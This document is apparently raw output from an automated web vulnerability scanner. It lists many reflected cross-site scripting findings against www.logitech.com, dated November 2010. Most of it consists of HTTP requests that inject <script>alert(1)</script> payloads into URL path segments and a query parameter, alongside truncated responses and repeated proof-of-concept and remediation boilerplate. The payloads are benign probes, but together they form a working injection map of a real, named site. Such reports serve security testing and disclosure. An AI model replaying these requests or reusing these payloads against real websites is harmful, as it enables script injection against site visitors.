GET /css/v28352b</script><script>alert(1)</script>b6ca9ac0cdd/cmn/navigation/bg-nav-headers/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e66a"><script>alert(1)</script>ad553a5b31a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /css/v27e66a"><script>alert(1)</script>ad553a5b31a/cmn/navigation/bg-nav-headers/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2172b</script><script>alert(1)</script>ec6039f9226 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/v2/cmn2172b</script><script>alert(1)</script>ec6039f9226/navigation/bg-nav-headers/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab32f"><script>alert(1)</script>e426beefa42 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /css/v2/cmnab32f"><script>alert(1)</script>e426beefa42/navigation/bg-nav-headers/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a03e7</script><script>alert(1)</script>1de8844da04 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/v2/cmn/navigationa03e7</script><script>alert(1)</script>1de8844da04/bg-nav-headers/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7653b"><script>alert(1)</script>7fe941f2f96 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /css/v2/cmn/navigation7653b"><script>alert(1)</script>7fe941f2f96/bg-nav-headers/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e4ba"><script>alert(1)</script>57abedc4949 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /css/v2/cmn/navigation/bg-nav-headers5e4ba"><script>alert(1)</script>57abedc4949/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91f8f</script><script>alert(1)</script>e3e3d1142a7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/v2/cmn/navigation/bg-nav-headers91f8f</script><script>alert(1)</script>e3e3d1142a7/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e234d</script><script>alert(1)</script>9bd87dee77b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1818c"><script>alert(1)</script>5ef0f52c19a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae4af"><script>alert(1)</script>0c2b3d08c4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5173a</script><script>alert(1)</script>cbab8300107 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc770</script><script>alert(1)</script>a866c9d71b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27121"><script>alert(1)</script>ca44c5e3751 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd4bb"><script>alert(1)</script>752052b3a53 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81793</script><script>alert(1)</script>cc47607ccab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6caee"><script>alert(1)</script>65dd3ca138f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68be9</script><script>alert(1)</script>5272fcf4652 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2eeb"><script>alert(1)</script>0b35e17aaf4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b39ea</script><script>alert(1)</script>b88e47674bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fc9d"><script>alert(1)</script>ad36cb01ee0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css/v2/promotion.css4fc9d"><script>alert(1)</script>ad36cb01ee0 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0933</script><script>alert(1)</script>188d5e56fa9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/v2/promotion.csse0933</script><script>alert(1)</script>188d5e56fa9 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b620"><script>alert(1)</script>b75ea8aed41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbdff</script><script>alert(1)</script>322e8945bf5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7df8a"><script>alert(1)</script>ab912e18d42 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css/v2/showcase.css7df8a"><script>alert(1)</script>ab912e18d42 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e47d</script><script>alert(1)</script>84ef89d4f23 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/v2/showcase.css3e47d</script><script>alert(1)</script>84ef89d4f23 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e27d7"><script>alert(1)</script>02d0fb5f3cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbe56</script><script>alert(1)</script>ae944f1784a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79af2"><script>alert(1)</script>b47b84ef801 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us79af2"><script>alert(1)</script>b47b84ef801 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a79c4</script><script>alert(1)</script>ed223318e31 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usa79c4</script><script>alert(1)</script>ed223318e31 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of the seo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88f1f</script><script>alert(1)</script>5a9cd263270 was submitted in the seo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us?seo=349/707388f1f</script><script>alert(1)</script>5a9cd263270&geo=US HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of the seo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae65f"><script>alert(1)</script>7da9abf12e9 was submitted in the seo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us?seo=349/7073ae65f"><script>alert(1)</script>7da9abf12e9&geo=US HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2b54"><script>alert(1)</script>7be0a39aa14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-usc2b54"><script>alert(1)</script>7be0a39aa14/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d951</script><script>alert(1)</script>e786a4bffbe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us9d951</script><script>alert(1)</script>e786a4bffbe/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6aa14"%3bd632a6ba26b was submitted in the REST URL parameter 1. This input was echoed as 6aa14";d632a6ba26b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us6aa14"%3bd632a6ba26b/1039 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e340"><script>alert(1)</script>e5843c6de3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us4e340"><script>alert(1)</script>e5843c6de3/1039 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26c54</script><script>alert(1)</script>7bff87b4bb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /26c54</script><script>alert(1)</script>7bff87b4bb6/1039 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13909"><script>alert(1)</script>8a551f0facc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/103913909"><script>alert(1)</script>8a551f0facc HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
